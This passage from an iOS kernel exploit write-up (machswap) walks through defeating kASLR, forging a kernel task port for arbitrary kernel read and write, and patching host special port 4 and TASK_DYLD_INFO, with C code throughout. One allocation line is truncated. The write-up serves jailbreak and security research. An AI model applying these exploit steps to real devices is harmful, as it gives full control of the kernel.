    uint64_t get_trap_for_index_addr = 0x0;
    rk64(iosruc_vtab + (offsets->iosurface.get_external_trap_for_index * 0x8), get_trap_for_index_addr);

get_trap_for_index_addr is the address of the IOSurfaceRootUserClient::getExternalTrapForIndex function, which resides in kernel’s __TEXT region. We can then walk backwards until we reach the magic value at the kernel header (MH_MAGIC_64).

#define KERNEL_HEADER_OFFSET        0x4000
#define KERNEL_SLIDE_STEP           0x100000
    
    uint64_t kernel_base = (get_trap_for_index_addr & ~(KERNEL_SLIDE_STEP - 1)) + KERNEL_HEADER_OFFSET;

    do
    {
        uint32_t kbase_value = 0x0;
        rk32(kernel_base, kbase_value);
    
        if (kbase_value == MH_MAGIC_64)
        {
            LOG("found kernel_base: 0x%llx", kernel_base);
            break;
        }

        kernel_base -= KERNEL_SLIDE_STEP;
    } while (true);

    uint64_t kslide = kernel_base - offsets->constant.kernel_image_base;

As we have deduced the kslide value, kASLR has now been defeated, and we continue with our exploitation by building the final primitive: the fake kernel task port. This task port will allow full read and write access to the kernel’s VM map, allowing arbitrary modification of kernel data.

0x08 Building a Fake Kernel Task Port

A kernel task port is simply a ipc_port struct of type IKOT_TASK, with a representation of the kernel’s task_t struct attached. However, when using the task port in the Mach API, many of the fields aren’t checked or accessed at any point. This means we don’t need to use the original ipc_port or task_t structs. We can simply forge arbitrary ones containing the minimum of data filled out in order for the Mach API to recognise it as a valid port. Luckily, there are only two things we need to find. The first is the kernel’s vm_map_t, which is a struct that holds data about the kernel’s virtual address space.

The kernel implements a nice feature which allows you to easily loop through proc_t structs (and hence their corresponding task_t counterparts) to find target processes, via a linked list (p_list) at the start of the proc_t struct. This includes the kernel’s proc and task structs (kernel_task actually runs as a “normal” process on your system, with the PID 0 – you can see it in Activity Monitor on macOS).

We already have the address of our own task_t from when we needed to find our IOSurfaceRootUserClient port earlier. So we can dereference the bsd_info pointer to get the corresponding proc_t struct, and then loop backward through the list until we reach the first entry, kernel_task.

struct	proc {
	LIST_ENTRY(proc) p_list;		/* List of all processes. */

	void * 		task;			/* corresponding task (static)*/
	struct	proc *	p_pptr;		 	/* Pointer to parent process.(LL) */

    [...]

    uint64_t kernproc = ourproc;
    while (kernproc != 0x0)
    {
        uint32_t found_pid = 0x0;
        rk32(kernproc + offsets->struct_offsets.proc_pid, found_pid);
        if (found_pid == 0)
        {
            break;
        }

        /* 
            kernproc will always be at the start of the linked list,
            so we loop backwards in order to find it
        */
        rk64(kernproc + 0x0, kernproc);
    }

From there we can read proc_t->task to get to the kernel’s task_t struct, which contains a field which is a pointer to the kernel’s vm_map_t:

struct task {
	/* Synchronization/destruction information */
	decl_lck_mtx_data(,lock)		/* Task's lock */
	_Atomic uint32_t	ref_count;	/* Number of references to me */
	boolean_t	active;		/* Task has not been terminated */
	boolean_t	halting;	/* Task is being halted */
	/* Virtual timers */
	uint32_t		vtimers;

	/* Miscellaneous */
	vm_map_t	map;		/* Address space description */
	queue_chain_t	tasks;	/* global list of tasks */

    [...]

To build our fake task struct, we can simply use some hardcoded data, and drop in our kernel vm_map pointer:

    fake_task->lock.data = 0x0;
    fake_task->lock.type = 0x22;
    fake_task->ref_count = 100;
    fake_task->active = 1;
    fake_task->map = kernel_vm_map;
    *(uint32_t *)((uint64_t)fake_task + offsets->struct_offsets.task_itk_self) = 1;

We also need to find the kernel’s ip_receiver, which is a struct where Mach messages that have not yet been received (ie. are in transit) are stored. This is easy to find however, as the receiver of our IOSurfaceUserClient is the kernel (as this is where messages are sent to on that port).

    /* 
        since our IOSurfaceRoot userclient is owned by kernel, the 
        ip_receiver field will point to kernel's ipc space 
    */ 
    uint64_t ipc_space_kernel = 0x0;
    rk64(iosruc_port + offsetof(kport_t, ip_receiver), ipc_space_kernel);
    LOG("ipc_space_kernel: 0x%llx", ipc_space_kernel);

We then temporarily turn our fakeport (the_one) into a kernel task port by updating it’s ip_receiver, which we can then use as an early tfp0 primitive in order to allocate and write some memory, for our kernel task and kernel port structs (error checking omitted):

    /* the_one should now have access to kernel mem */

    uint64_t kbase_data = kread64(the_one, kernel_base);
    LOG("got kernel base: %llx", kbase_data);

    /* allocate kernel task */

    uint64_t kernel_task_buf = kalloc(the_one, 0x600);
    LOG("kernel_task_buf: 0x%llx", kernel_task_buf);

    kwrite(the_one, kernel_task_buf, (void *)fake_task, 0x600);

    /* allocate kernel port */
    uint64_t kernel_port_buf = kalloc(the_one, 0x3
    LOG("kernel_port_buf: 0x%llx", kernel_port_buf);

    fakeport->ip_kobject = kernel_task_buf;

    kwrite(the_one, kernel_port_buf, (void *)fakeport, 0x300);

Our fakeport the_one is now a “full” (but forged) kernel task port (tfp0) which can be used to read, write, and allocate kernel memory, and is backed completely by kernel buffers – no userland allocations are used after this point.

0x09 Buttoning Up: HSP4, TASK_DYLD_INFO patch

There are a couple more finishing touches we need to do before we can exit our exploit. The first is setting up the hsp4 (host_get_special_port(..., 4, ...)) patch, which allows processes running as root to get a send right to the kernel task port (tfp0).

This is fairly easy to set up, we simply need to perform a write to the realhost struct, into the ipc_port_t special array.

struct	host {
	decl_lck_mtx_data(,lock)		/* lock to protect exceptions */
	ipc_port_t special[HOST_MAX_SPECIAL_PORT + 1];
	struct exception_action exc_actions[EXC_TYPES_COUNT];
};

    /*
        host_get_special_port(4) patch
        allows the kernel task port to be accessed by any root process 
    */
    kwrite64(the_one, realhost + 0x10 + (sizeof(uint64_t) * 4), kernel_port_buf);

We can then quickly elevate our UID to 0 (root) in order to check the patch worked, as the host_special API requires root access.

Note: we also de-elevate back to the mobile user before exiting the exploit as leaving ourselves as root can cause instability in the system upon exiting the app. Jailbreaks can quickly and easily re-elevate to root if and when required.

Another (new) patch is the TASK_DYLD_INFO patch, suggested by @Siguza here. The task_info API allows an application to retrieve information about a specific process, including info about the dynamic linker. As we can see in the following snippet, the kernel will return three fields of data stored in the task back to userland.

	case TASK_DYLD_INFO:
	{
		task_dyld_info_t info;

        [...]

		info = (task_dyld_info_t)task_info_out;
		info->all_image_info_addr = task->all_image_info_addr;
		info->all_image_info_size = task->all_image_info_size;

		/* only set format on output for those expecting it */
		if (*task_info_count >= TASK_DYLD_INFO_COUNT) {
			info->all_image_info_format = task_has_64Bit_addr(task) ?
				                 TASK_DYLD_ALL_IMAGE_INFO_64 :
				                 TASK_DYLD_ALL_IMAGE_INFO_32 ;
			*task_info_count = TASK_DYLD_INFO_COUNT;
		} else {
			*task_info_count = TASK_LEGACY_DYLD_INFO_COUNT;
		}
		break;
	}

Since the kernel doesn’t use DYLD, nor will our fake task port ever be used by the kernel itself, we can use these fields to store data about the kernel. In this case, we can use the all_image_info_addr field to store the slid base address of the kernel, and the all_image_info_size field to store the kernel slide. This helps alleviate the use of offset-storing files and provides a clean method to find the (previously somewhat tricky to deduce) kernel slide.

    /* 
        task_info TASK_DYLD_INFO patch 
        this patch (credit @Siguza) allows you to provide tfp0 to the task_info
        API, and retreive some data from the kernel's task struct
        we use it for storing the kernel base and kernel slide values 
    */ 
    *(uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_all_image_info_addr) = kernel_base;
    *(uint64_t *)((uint64_t)fake_task + offsets->struct_offsets.task_all_image_info_size) = kslide;

You can then call task_info, providing tfp0 as your port and supplying the TASK_DYLD_INFO flag.

0x0A: Closing Words

For a long time I was completely daunted by the idea of exploiting something as complex as the iOS kernel. However, once I dived in and gave it a go it quickly started to make more and more sense. There is a lot of great reading material online to refer to, including writeups and other open-source exploits. I’m now a big fan of MIG reference counting bugs due to their exploitational simplicity and consistency, and would love to find one as a 0day one day. ;)

Of course thanks to @s1guza, @littlelailo, and @stek29 for development help, and @s0rrymybad for the intial bug details and PoC code. You can find their Twitter handles below.

If you have any questions feel free to @ me and/or follow me on Twitter, and take a look through my GitHub if you’re interested in other open-source iOS projects. Thanks!

Twitter: https://twitter.com/iBSparkes

GitHub: https://github.com/PsychoTea

machswap Source Code: https://github.com/PsychoTea/machswap

machswap2 (SMAP Version): https://github.com/PsychoTea/machswap2

@s1guza: https://twitter.com/s1guza

@littlelailo: https://twitter.com/littlelailo

@stek29: https://twitter.com/stek29

@s0rrymybad: https://twitter.com/s0rrymybad